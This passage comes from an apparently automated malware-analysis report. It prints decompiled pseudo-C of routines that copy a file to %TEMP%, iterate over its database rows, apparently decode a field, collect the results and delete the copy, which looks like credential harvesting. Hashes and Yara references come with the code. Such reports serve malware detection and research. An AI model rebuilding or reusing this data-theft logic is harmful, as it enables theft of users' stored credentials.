				E004040F4( &_v8);
				_push(_t229);
				_push(0x411163);
				_push( *[fs:eax]);
				 *[fs:eax] = _t230;
				E00403B80( &_v28);
				_push(_t229);
				_push(0x4110ce);
				_push( *[fs:eax]);
				 *[fs:eax] = _t230;
				E00406FDC(GetTickCount(), __ebx,  &_v52, __esi, _t238);
				_push(_v52);
				E00406F1C( &_v56, __ebx, __edi, __esi, _t238);
				_push(_v56);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t189,  &_v40, _t238);
				E004062D8(L"%TEMP%",  &_v64, _t238);
				_push(_v64);
				_push(0x41119c);
				_push(_v32);
				E00403E1C();
				E0040781C(_v60, _t189,  &_v44, _t238);
				_t90 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t90, 0xffffffff);
				E0040377C( &_v68, _v44);
				E00404AFC(_v68, _t189, _t190,  &_v36, _t227, _t238);
				E00403D2C( &_v72, _v36);
				if(E004076B0(_v72, _t189, _t190) != 0) {
					_t105 =  *0x41b55c; // 0x41c784
					_t107 =  *((intOrPtr*)( *_t105))(E00403990(_v36),  &_v16);
					_t231 = _t230 + 8;
					__eflags = _t107;
					if(_t107 == 0) {
						E00408120(0x66,  &_v76);
						_t150 =  *0x41b5cc; // 0x41c78c
						_t152 =  *((intOrPtr*)( *_t150))(_v16, E00403990(_v76), 0xffffffff,  &_v20,  &_v24);
						_t232 = _t231 + 0x14;
						__eflags = _t152;
						if(_t152 == 0) {
							while(1) {
								_t154 =  *0x41b600; // 0x41c790
								_t156 =  *((intOrPtr*)( *_t154))(_v20);
								__eflags = _t156 - 0x64;
								if(_t156 != 0x64) {
									goto L10;
								}
								_t158 =  *0x41b644; // 0x41c798
								_t162 =  *0x41b588; // 0x41c794
								_t164 =  *((intOrPtr*)( *_t162))(_v20, 3,  *((intOrPtr*)( *_t158))(_v20, 3));
								_pop(_t219);
								E004094C4(_t164,  &_v48, _t219);
								E00403D2C( &_v80, _v48);
								_t169 =  *0x41b588; // 0x41c794
								E00403C98( &_v84,  *((intOrPtr*)( *_t169))(_v20, 0, 0x4111a4, _v80, _v28));
								_t175 =  *0x41b588; // 0x41c794
								E00403C98( &_v88,  *((intOrPtr*)( *_t175))(_v20, 1, 0x4111a4, _v84));
								_t181 =  *0x41b588; // 0x41c794
								_t183 =  *((intOrPtr*)( *_t181))(_v20, 2, 0x4111b0, _v88);
								_t232 = _t232 + 0x28;
								E00403C98( &_v92, _t183);
								_push(_v92);
								_push(L"\r\n\r\n");
								E00403E1C();
								_t187 =  *0x41b584; // 0x41b0b4
								 *_t187 =  *_t187 + 1;
								__eflags =  *_t187;
							}
						}
					}
					L10:
					_t109 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t109))(_v20);
					_t113 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t113))(_v16);
					_pop(_t211);
					 *[fs:eax] = _t211;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t225);
					 *[fs:eax] = _t225;
				}
				_pop(_t213);
				 *[fs:eax] = _t213;
				_push(E0041116A);
				E00403B98( &_v92, 4);
				E004034E4( &_v76);
				E00403B80( &_v72);
				E004034E4( &_v68);
				E00403B98( &_v64, 4);
				E004034E4( &_v48);
				E00403B98( &_v44, 2);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}





















































                                                                                                                                                                                          0x00410e68
                                                                                                                                                                                          0x00410e68
                                                                                                                                                                                          0x00410e68
                                                                                                                                                                                          0x00410e6d
                                                                                                                                                                                          0x00410e6f
                                                                                                                                                                                          0x00410e71
                                                                                                                                                                                          0x00410e73
                                                                                                                                                                                          0x00410e78
                                                                                                                                                                                          0x00410e78
                                                                                                                                                                                          0x00410e7a
                                                                                                                                                                                          0x00410e7c
                                                                                                                                                                                          0x00410e7c
                                                                                                                                                                                          0x00410e7c
                                                                                                                                                                                          0x00410e7f
                                                                                                                                                                                          0x00410e80
                                                                                                                                                                                          0x00410e81
                                                                                                                                                                                          0x00410e82
                                                                                                                                                                                          0x00410e85
                                                                                                                                                                                          0x00410e8b
                                                                                                                                                                                          0x00410e92
                                                                                                                                                                                          0x00410e93
                                                                                                                                                                                          0x00410e98
                                                                                                                                                                                          0x00410e9b
                                                                                                                                                                                          0x00410ea1
                                                                                                                                                                                          0x00410ea8
                                                                                                                                                                                          0x00410ea9
                                                                                                                                                                                          0x00410eae
                                                                                                                                                                                          0x00410eb1
                                                                                                                                                                                          0x00410ebc
                                                                                                                                                                                          0x00410ec1
                                                                                                                                                                                          0x00410ec7
                                                                                                                                                                                          0x00410ecc
                                                                                                                                                                                          0x00410ecf
                                                                                                                                                                                          0x00410edc
                                                                                                                                                                                          0x00410ee7
                                                                                                                                                                                          0x00410ef4
                                                                                                                                                                                          0x00410ef9
                                                                                                                                                                                          0x00410efc
                                                                                                                                                                                          0x00410f01
                                                                                                                                                                                          0x00410f0c
                                                                                                                                                                                          0x00410f17
                                                                                                                                                                                          0x00410f21
                                                                                                                                                                                          0x00410f30
                                                                                                                                                                                          0x00410f3b
                                                                                                                                                                                          0x00410f46
                                                                                                                                                                                          0x00410f51
                                                                                                                                                                                          0x00410f60
                                                                                                                                                                                          0x00410f7c
                                                                                                                                                                                          0x00410f83
                                                                                                                                                                                          0x00410f85
                                                                                                                                                                                          0x00410f88
                                                                                                                                                                                          0x00410f8a
                                                                                                                                                                                          0x00410fa2
                                                                                                                                                                                          0x00410fb4
                                                                                                                                                                                          0x00410fbb
                                                                                                                                                                                          0x00410fbd
                                                                                                                                                                                          0x00410fc0
                                                                                                                                                                                          0x00410fc2
                                                                                                                                                                                          0x00411091
                                                                                                                                                                                          0x00411095
                                                                                                                                                                                          0x0041109c
                                                                                                                                                                                          0x0041109f
                                                                                                                                                                                          0x004110a2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00410fd3
                                                                                                                                                                                          0x00410fe6
                                                                                                                                                                                          0x00410fed
                                                                                                                                                                                          0x00410ff5
                                                                                                                                                                                          0x00410ff6
                                                                                                                                                                                          0x00411004
                                                                                                                                                                                          0x00411017
                                                                                                                                                                                          0x00411028
                                                                                                                                                                                          0x0041103b
                                                                                                                                                                                          0x0041104c
                                                                                                                                                                                          0x0041105f
                                                                                                                                                                                          0x00411066
                                                                                                                                                                                          0x00411068
                                                                                                                                                                                          0x00411070
                                                                                                                                                                                          0x00411075
                                                                                                                                                                                          0x00411078
                                                                                                                                                                                          0x00411085
                                                                                                                                                                                          0x0041108a
                                                                                                                                                                                          0x0041108f
                                                                                                                                                                                          0x0041108f
                                                                                                                                                                                          0x0041108f
                                                                                                                                                                                          0x00411091
                                                                                                                                                                                          0x00410fc2
                                                                                                                                                                                          0x004110a8
                                                                                                                                                                                          0x004110ac
                                                                                                                                                                                          0x004110b3
                                                                                                                                                                                          0x004110ba
                                                                                                                                                                                          0x004110c1
                                                                                                                                                                                          0x004110c6
                                                                                                                                                                                          0x004110c9
                                                                                                                                                                                          0x004110de
                                                                                                                                                                                          0x004110ec
                                                                                                                                                                                          0x00410f62
                                                                                                                                                                                          0x00410f64
                                                                                                                                                                                          0x00410f67
                                                                                                                                                                                          0x00410f67
                                                                                                                                                                                          0x004110f3
                                                                                                                                                                                          0x004110f6
                                                                                                                                                                                          0x004110f9
                                                                                                                                                                                          0x00411106
                                                                                                                                                                                          0x0041110e
                                                                                                                                                                                          0x00411116
                                                                                                                                                                                          0x0041111e
                                                                                                                                                                                          0x0041112b
                                                                                                                                                                                          0x00411133
                                                                                                                                                                                          0x00411140
                                                                                                                                                                                          0x00411148
                                                                                                                                                                                          0x00411155
                                                                                                                                                                                          0x00411162

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00410EB4
                                                                                                                                                                                          • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CopyCountFileTick
                                                                                                                                                                                          • String ID: %TEMP%$.tmp
                                                                                                                                                                                          • API String ID: 3448371392-3650661790
                                                                                                                                                                                          • Opcode ID: fd3ed2e0f10af06c7055efab6d8518f1a7d31fde7c18b0f8517e5c88414f77f6
                                                                                                                                                                                          • Instruction ID: 3bd2312418c75e2bfd4f88111c3886d823680ea6e83d1d6075c9c2a9f0993f15
                                                                                                                                                                                          • Opcode Fuzzy Hash: fd3ed2e0f10af06c7055efab6d8518f1a7d31fde7c18b0f8517e5c88414f77f6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4241013190410DAEDB01FFA1D842ADDBBB9EF49318F50447BF500B36A2D77DAE458A58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410BB0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 108fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 47%
                                                                                                                                                                                          			E00410BB0(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				signed int _t57;
				signed int _t58;
				WCHAR* _t78;
				intOrPtr* _t93;
				void* _t95;
				intOrPtr* _t97;
				intOrPtr* _t101;
				intOrPtr* _t134;
				void* _t136;
				intOrPtr* _t138;
				void* _t140;
				intOrPtr* _t142;
				intOrPtr* _t148;
				void* _t150;
				void* _t156;
				intOrPtr _t176;
				intOrPtr _t178;
				intOrPtr _t186;
				intOrPtr _t190;
				intOrPtr _t191;
				void* _t192;
				void* _t193;

				_t188 = __esi;
				_t155 = __ebx;
				_t57 = __eax +  *__eax;
				 *_t57 =  *_t57 + _t57;
				_t58 = _t57 | 0x5500000a;
				_t190 = _t191;
				_t156 = 9;
				do {
					_push(0);
					_push(0);
					_t156 = _t156 - 1;
					_t197 = _t156;
				} while (_t156 != 0);
				_push(_t156);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = _t58;
				E004040F4( &_v8);
				_push(_t190);
				_push(0x410e20);
				_push( *[fs:eax]);
				 *[fs:eax] = _t191;
				E00403B80( &_v28);
				_push(_t190);
				_push(0x410da0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t191;
				E00406FDC(GetTickCount(), __ebx,  &_v48, __esi, _t197);
				_push(_v48);
				E00406F1C( &_v52, __ebx, __edi, __esi, _t197);
				_push(_v52);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t155,  &_v40, _t197);
				E004062D8(L"%TEMP%",  &_v60, _t197);
				_push(_v60);
				_push(E00410E58);
				_push(_v32);
				E00403E1C();
				E0040781C(_v56, _t155,  &_v44, _t197);
				_t78 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t78, 0xffffffff);
				E0040377C( &_v64, _v44);
				E00404AFC(_v64, _t155, _t156,  &_v36, _t188, _t197);
				E00403D2C( &_v68, _v36);
				if(E004076B0(_v68, _t155, _t156) != 0) {
					_t93 =  *0x41b55c; // 0x41c784
					_t95 =  *((intOrPtr*)( *_t93))(E00403990(_v36),  &_v16);
					_t192 = _t191 + 8;
					__eflags = _t95;
					if(_t95 == 0) {
						E00408120(0x65,  &_v72);
						_t134 =  *0x41b5cc; // 0x41c78c
						_t136 =  *((intOrPtr*)( *_t134))(_v16, E00403990(_v72), 0xffffffff,  &_v20,  &_v24);
						_t193 = _t192 + 0x14;
						__eflags = _t136;
						if(_t136 == 0) {
							while(1) {
								_t138 =  *0x41b600; // 0x41c790
								_t140 =  *((intOrPtr*)( *_t138))(_v20);
								__eflags = _t140 - 0x64;
								if(_t140 != 0x64) {
									goto L11;
								}
								_t142 =  *0x41b588; // 0x41c794
								E00403C98( &_v76,  *((intOrPtr*)( *_t142))(_v20, 0, _v28));
								_t148 =  *0x41b588; // 0x41c794
								_t150 =  *((intOrPtr*)( *_t148))(_v20, 1, E00410E60, _v76);
								_t193 = _t193 + 0x10;
								E00403C98( &_v80, _t150);
								_push(_v80);
								_push(E00410E68);
								E00403E1C();
							}
						}
					}
					L11:
					_t97 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t97))(_v20);
					_t101 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t101))(_v16);
					_pop(_t176);
					 *[fs:eax] = _t176;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t186);
					 *[fs:eax] = _t186;
				}
				_pop(_t178);
				 *[fs:eax] = _t178;
				_push(E00410E27);
				E00403B98( &_v80, 2);
				E004034E4( &_v72);
				E00403B80( &_v68);
				E004034E4( &_v64);
				E00403B98( &_v60, 6);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}












































                                                                                                                                                                                          0x00410bb0
                                                                                                                                                                                          0x00410bb0
                                                                                                                                                                                          0x00410bb0
                                                                                                                                                                                          0x00410bb2
                                                                                                                                                                                          0x00410bb4
                                                                                                                                                                                          0x00410bb9
                                                                                                                                                                                          0x00410bbb
                                                                                                                                                                                          0x00410bc0
                                                                                                                                                                                          0x00410bc0
                                                                                                                                                                                          0x00410bc2
                                                                                                                                                                                          0x00410bc4
                                                                                                                                                                                          0x00410bc4
                                                                                                                                                                                          0x00410bc4
                                                                                                                                                                                          0x00410bc7
                                                                                                                                                                                          0x00410bc8
                                                                                                                                                                                          0x00410bc9
                                                                                                                                                                                          0x00410bca
                                                                                                                                                                                          0x00410bcb
                                                                                                                                                                                          0x00410bce
                                                                                                                                                                                          0x00410bd4
                                                                                                                                                                                          0x00410bdb
                                                                                                                                                                                          0x00410bdc
                                                                                                                                                                                          0x00410be1
                                                                                                                                                                                          0x00410be4
                                                                                                                                                                                          0x00410bea
                                                                                                                                                                                          0x00410bf1
                                                                                                                                                                                          0x00410bf2
                                                                                                                                                                                          0x00410bf7
                                                                                                                                                                                          0x00410bfa
                                                                                                                                                                                          0x00410c05
                                                                                                                                                                                          0x00410c0a
                                                                                                                                                                                          0x00410c10
                                                                                                                                                                                          0x00410c15
                                                                                                                                                                                          0x00410c18
                                                                                                                                                                                          0x00410c25
                                                                                                                                                                                          0x00410c30
                                                                                                                                                                                          0x00410c3d
                                                                                                                                                                                          0x00410c42
                                                                                                                                                                                          0x00410c45
                                                                                                                                                                                          0x00410c4a
                                                                                                                                                                                          0x00410c55
                                                                                                                                                                                          0x00410c60
                                                                                                                                                                                          0x00410c6a
                                                                                                                                                                                          0x00410c79
                                                                                                                                                                                          0x00410c84
                                                                                                                                                                                          0x00410c8f
                                                                                                                                                                                          0x00410c9a
                                                                                                                                                                                          0x00410ca9
                                                                                                                                                                                          0x00410cc5
                                                                                                                                                                                          0x00410ccc
                                                                                                                                                                                          0x00410cce
                                                                                                                                                                                          0x00410cd1
                                                                                                                                                                                          0x00410cd3
                                                                                                                                                                                          0x00410ceb
                                                                                                                                                                                          0x00410cfd
                                                                                                                                                                                          0x00410d04
                                                                                                                                                                                          0x00410d06
                                                                                                                                                                                          0x00410d09
                                                                                                                                                                                          0x00410d0b
                                                                                                                                                                                          0x00410d67
                                                                                                                                                                                          0x00410d6b
                                                                                                                                                                                          0x00410d72
                                                                                                                                                                                          0x00410d75
                                                                                                                                                                                          0x00410d78
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00410d18
                                                                                                                                                                                          0x00410d29
                                                                                                                                                                                          0x00410d3c
                                                                                                                                                                                          0x00410d43
                                                                                                                                                                                          0x00410d45
                                                                                                                                                                                          0x00410d4d
                                                                                                                                                                                          0x00410d52
                                                                                                                                                                                          0x00410d55
                                                                                                                                                                                          0x00410d62
                                                                                                                                                                                          0x00410d62
                                                                                                                                                                                          0x00410d67
                                                                                                                                                                                          0x00410d0b
                                                                                                                                                                                          0x00410d7a
                                                                                                                                                                                          0x00410d7e
                                                                                                                                                                                          0x00410d85
                                                                                                                                                                                          0x00410d8c
                                                                                                                                                                                          0x00410d93
                                                                                                                                                                                          0x00410d98
                                                                                                                                                                                          0x00410d9b
                                                                                                                                                                                          0x00410db0
                                                                                                                                                                                          0x00410dbe
                                                                                                                                                                                          0x00410cab
                                                                                                                                                                                          0x00410cad
                                                                                                                                                                                          0x00410cb0
                                                                                                                                                                                          0x00410cb0
                                                                                                                                                                                          0x00410dc5
                                                                                                                                                                                          0x00410dc8
                                                                                                                                                                                          0x00410dcb
                                                                                                                                                                                          0x00410dd8
                                                                                                                                                                                          0x00410de0
                                                                                                                                                                                          0x00410de8
                                                                                                                                                                                          0x00410df0
                                                                                                                                                                                          0x00410dfd
                                                                                                                                                                                          0x00410e05
                                                                                                                                                                                          0x00410e12
                                                                                                                                                                                          0x00410e1f

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00410BFD
                                                                                                                                                                                          • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CopyCountFileTick
                                                                                                                                                                                          • String ID: %TEMP%$.tmp
                                                                                                                                                                                          • API String ID: 3448371392-3650661790
                                                                                                                                                                                          • Opcode ID: 3c9c793cbba2b1494e5bbcc8797dd77cc55da2a1b03f1701932884ea86e2c921
                                                                                                                                                                                          • Instruction ID: ad1686550c7843c0884c0506788be05dc1fde737249d1bd281ecbc27d8194f8d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c9c793cbba2b1494e5bbcc8797dd77cc55da2a1b03f1701932884ea86e2c921
                                                                                                                                                                                          • Instruction Fuzzy Hash: BF412330914109AEDB01FF91D952ADDBBBDEF49318F50447BF400B7292D77CAE458A58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410BB4, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 106fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 46%
                                                                                                                                                                                          			E00410BB4(signed int __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				signed int _t57;
				WCHAR* _t77;
				intOrPtr* _t92;
				void* _t94;
				intOrPtr* _t96;
				intOrPtr* _t100;
				intOrPtr* _t133;
				void* _t135;
				intOrPtr* _t137;
				void* _t139;
				intOrPtr* _t141;
				intOrPtr* _t147;
				void* _t149;
				void* _t155;
				intOrPtr _t175;
				intOrPtr _t177;
				intOrPtr _t185;
				intOrPtr _t189;
				intOrPtr _t190;
				void* _t191;
				void* _t192;

				_t187 = __esi;
				_t154 = __ebx;
				_t57 = __eax | 0x5500000a;
				_t189 = _t190;
				_t155 = 9;
				do {
					_push(0);
					_push(0);
					_t155 = _t155 - 1;
					_t195 = _t155;
				} while (_t155 != 0);
				_push(_t155);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = _t57;
				E004040F4( &_v8);
				_push(_t189);
				_push(0x410e20);
				_push( *[fs:eax]);
				 *[fs:eax] = _t190;
				E00403B80( &_v28);
				_push(_t189);
				_push(0x410da0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t190;
				E00406FDC(GetTickCount(), __ebx,  &_v48, __esi, _t195);
				_push(_v48);
				E00406F1C( &_v52, __ebx, __edi, __esi, _t195);
				_push(_v52);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t154,  &_v40, _t195);
				E004062D8(L"%TEMP%",  &_v60, _t195);
				_push(_v60);
				_push(E00410E58);
				_push(_v32);
				E00403E1C();
				E0040781C(_v56, _t154,  &_v44, _t195);
				_t77 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t77, 0xffffffff);
				E0040377C( &_v64, _v44);
				E00404AFC(_v64, _t154, _t155,  &_v36, _t187, _t195);
				E00403D2C( &_v68, _v36);
				if(E004076B0(_v68, _t154, _t155) != 0) {
					_t92 =  *0x41b55c; // 0x41c784
					_t94 =  *((intOrPtr*)( *_t92))(E00403990(_v36),  &_v16);
					_t191 = _t190 + 8;
					__eflags = _t94;
					if(_t94 == 0) {
						E00408120(0x65,  &_v72);
						_t133 =  *0x41b5cc; // 0x41c78c
						_t135 =  *((intOrPtr*)( *_t133))(_v16, E00403990(_v72), 0xffffffff,  &_v20,  &_v24);
						_t192 = _t191 + 0x14;
						__eflags = _t135;
						if(_t135 == 0) {
							while(1) {
								_t137 =  *0x41b600; // 0x41c790
								_t139 =  *((intOrPtr*)( *_t137))(_v20);
								__eflags = _t139 - 0x64;
								if(_t139 != 0x64) {
									goto L10;
								}
								_t141 =  *0x41b588; // 0x41c794
								E00403C98( &_v76,  *((intOrPtr*)( *_t141))(_v20, 0, _v28));
								_t147 =  *0x41b588; // 0x41c794
								_t149 =  *((intOrPtr*)( *_t147))(_v20, 1, E00410E60, _v76);
								_t192 = _t192 + 0x10;
								E00403C98( &_v80, _t149);
								_push(_v80);
								_push(E00410E68);
								E00403E1C();
							}
						}
					}
					L10:
					_t96 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t96))(_v20);
					_t100 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t100))(_v16);
					_pop(_t175);
					 *[fs:eax] = _t175;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t185);
					 *[fs:eax] = _t185;
				}
				_pop(_t177);
				 *[fs:eax] = _t177;
				_push(E00410E27);
				E00403B98( &_v80, 2);
				E004034E4( &_v72);
				E00403B80( &_v68);
				E004034E4( &_v64);
				E00403B98( &_v60, 6);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}











































                                                                                                                                                                                          0x00410bb4
                                                                                                                                                                                          0x00410bb4
                                                                                                                                                                                          0x00410bb4
                                                                                                                                                                                          0x00410bb9
                                                                                                                                                                                          0x00410bbb
                                                                                                                                                                                          0x00410bc0
                                                                                                                                                                                          0x00410bc0
                                                                                                                                                                                          0x00410bc2
                                                                                                                                                                                          0x00410bc4
                                                                                                                                                                                          0x00410bc4
                                                                                                                                                                                          0x00410bc4
                                                                                                                                                                                          0x00410bc7
                                                                                                                                                                                          0x00410bc8
                                                                                                                                                                                          0x00410bc9
                                                                                                                                                                                          0x00410bca
                                                                                                                                                                                          0x00410bcb
                                                                                                                                                                                          0x00410bce
                                                                                                                                                                                          0x00410bd4
                                                                                                                                                                                          0x00410bdb
                                                                                                                                                                                          0x00410bdc
                                                                                                                                                                                          0x00410be1
                                                                                                                                                                                          0x00410be4
                                                                                                                                                                                          0x00410bea
                                                                                                                                                                                          0x00410bf1
                                                                                                                                                                                          0x00410bf2
                                                                                                                                                                                          0x00410bf7
                                                                                                                                                                                          0x00410bfa
                                                                                                                                                                                          0x00410c05
                                                                                                                                                                                          0x00410c0a
                                                                                                                                                                                          0x00410c10
                                                                                                                                                                                          0x00410c15
                                                                                                                                                                                          0x00410c18
                                                                                                                                                                                          0x00410c25
                                                                                                                                                                                          0x00410c30
                                                                                                                                                                                          0x00410c3d
                                                                                                                                                                                          0x00410c42
                                                                                                                                                                                          0x00410c45
                                                                                                                                                                                          0x00410c4a
                                                                                                                                                                                          0x00410c55
                                                                                                                                                                                          0x00410c60
                                                                                                                                                                                          0x00410c6a
                                                                                                                                                                                          0x00410c79
                                                                                                                                                                                          0x00410c84
                                                                                                                                                                                          0x00410c8f
                                                                                                                                                                                          0x00410c9a
                                                                                                                                                                                          0x00410ca9
                                                                                                                                                                                          0x00410cc5
                                                                                                                                                                                          0x00410ccc
                                                                                                                                                                                          0x00410cce
                                                                                                                                                                                          0x00410cd1
                                                                                                                                                                                          0x00410cd3
                                                                                                                                                                                          0x00410ceb
                                                                                                                                                                                          0x00410cfd
                                                                                                                                                                                          0x00410d04
                                                                                                                                                                                          0x00410d06
                                                                                                                                                                                          0x00410d09
                                                                                                                                                                                          0x00410d0b
                                                                                                                                                                                          0x00410d67
                                                                                                                                                                                          0x00410d6b
                                                                                                                                                                                          0x00410d72
                                                                                                                                                                                          0x00410d75
                                                                                                                                                                                          0x00410d78
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00410d18
                                                                                                                                                                                          0x00410d29
                                                                                                                                                                                          0x00410d3c
                                                                                                                                                                                          0x00410d43
                                                                                                                                                                                          0x00410d45
                                                                                                                                                                                          0x00410d4d
                                                                                                                                                                                          0x00410d52
                                                                                                                                                                                          0x00410d55
                                                                                                                                                                                          0x00410d62
                                                                                                                                                                                          0x00410d62
                                                                                                                                                                                          0x00410d67
                                                                                                                                                                                          0x00410d0b
                                                                                                                                                                                          0x00410d7a
                                                                                                                                                                                          0x00410d7e
                                                                                                                                                                                          0x00410d85
                                                                                                                                                                                          0x00410d8c
                                                                                                                                                                                          0x00410d93
                                                                                                                                                                                          0x00410d98
                                                                                                                                                                                          0x00410d9b
                                                                                                                                                                                          0x00410db0
                                                                                                                                                                                          0x00410dbe
                                                                                                                                                                                          0x00410cab
                                                                                                                                                                                          0x00410cad
                                                                                                                                                                                          0x00410cb0
                                                                                                                                                                                          0x00410cb0
                                                                                                                                                                                          0x00410dc5
                                                                                                                                                                                          0x00410dc8
                                                                                                                                                                                          0x00410dcb
                                                                                                                                                                                          0x00410dd8
                                                                                                                                                                                          0x00410de0
                                                                                                                                                                                          0x00410de8
                                                                                                                                                                                          0x00410df0
                                                                                                                                                                                          0x00410dfd
                                                                                                                                                                                          0x00410e05
                                                                                                                                                                                          0x00410e12
                                                                                                                                                                                          0x00410e1f

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00410BFD
                                                                                                                                                                                          • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CopyCountFileTick
                                                                                                                                                                                          • String ID: %TEMP%$.tmp
                                                                                                                                                                                          • API String ID: 3448371392-3650661790
                                                                                                                                                                                          • Opcode ID: 7e65eb29c14a11400a8ae9f9535f570905a72362550addcf7d14f60cf147a02b
                                                                                                                                                                                          • Instruction ID: ab4a798e1dfa23648b03a2b2561a2af29de01fabf162149de749457abe37d48b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e65eb29c14a11400a8ae9f9535f570905a72362550addcf7d14f60cf147a02b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 37411331910109AEDB01FF92D952ADDBBBDEF48318F50447BF400B3292D77DAE458A58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040DDB0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 80fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 69%
                                                                                                                                                                                          			E0040DDB0(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t29;
				void* _t40;
				WCHAR* _t51;
				int _t54;
				void* _t59;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t73;
				void* _t74;
				intOrPtr _t77;
				void* _t78;
				void* _t79;

				_t74 = __esi;
				_t73 = __edi;
				_t63 = __edx;
				_t59 = __ebx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E00403980(_v12);
				_push(_t77);
				_push(0x40deaf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t77;
				_t29 = E00403790(_v16);
				asm("cdq");
				_t78 = _t63 -  *0x41c82c; // 0x0
				if(_t78 != 0) {
					if(__eflags < 0) {
						goto L4;
					}
				} else {
					_t79 = _t29 -  *0x41c828; // 0x0
					if(_t79 < 0) {
						L4:
						E00407168(_v8, _t59,  &_v16);
						_t40 = E00403790(_v16);
						_t80 = _t40;
						if(_t40 == 0) {
							_t9 =  &_v20; // 0x414c4c
							E004062D8(L"%TEMP%\\curbuf.dat", _t9, _t80);
							_t10 =  &_v20; // 0x414c4c
							_t51 = E00403D3C( *_t10);
							_t54 = CopyFileW(E00403D3C(_v8), _t51, 0);
